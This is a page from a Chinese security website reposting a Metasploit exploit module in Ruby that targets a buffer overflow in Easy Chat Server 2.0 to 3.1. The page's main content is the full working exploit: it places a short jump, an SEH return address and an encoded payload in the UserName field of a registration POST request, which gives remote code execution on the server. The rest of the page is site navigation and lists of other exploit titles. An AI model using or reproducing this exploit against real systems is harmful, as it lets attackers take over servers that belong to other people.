首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easy Chat Server User Registeration Buffer Overflow (SEH)
来源:metasploit.com 作者:Rivoli 发布时间:2017-07-25  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
      'Description'    => %q{
        This module exploits a buffer overflow during user registration in Easy Chat Server software.
      },
      'Author'         =>
        [
          'Marco Rivoli', #Metasploit
          'Aitezaz Mohsin' #POC
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '42155' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
        ],
      'DefaultOptions' => {
          'RPORT' => 80,
          'EXITFUNC' => 'thread',
          'ENCODER' => 'x86/alpha_mixed'
        },
      'DisclosureDate' => 'Oct 09 2017',
      'DefaultTarget'  => 0))
  end

  def exploit
    sploit = rand_text_alpha_upper(217)
    sploit << "\xeb\x06\x90\x90"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(200)

    res = send_request_cgi({
      'uri'    => normalize_uri(URI,'registresult.htm'),
      'method' => 'POST',
      'vars_post'  => {
        'UserName' => sploit,
        'Password' => 'test',
        'Password1' => 'test',
        'Sex' => 1,
        'Email' => 'x@',
        'Icon' => 'x.gif',
        'Resume' => 'xxxx',
        'cw' => 1,
        'RoomID' => 4,
        'RepUserName' => 'admin',
        'submit1' => 'Register'
      }
    })
    handler

  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Metasploit RPC Console Command
·Microsoft Internet Explorer -
·Netscaler SD-WAN 9.1.2.26.5612
·MAWK 1.3.3-17 - Local Buffer O
·Sonicwall < 8.1.0.2-14sv - 'si
·ManageEngine Desktop Central 1
·Sonicwall < 8.1.0.6-21sv - 'ge
·Razer Synapse 2.20.15.1104 - r
·Microsoft Windows Kernel - 'IO
·IPFire < 2.19 Update Core 110
·Microsoft Internet Explorer 11
·VICIdial 2.9 RC 1 to 2.13 RC1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved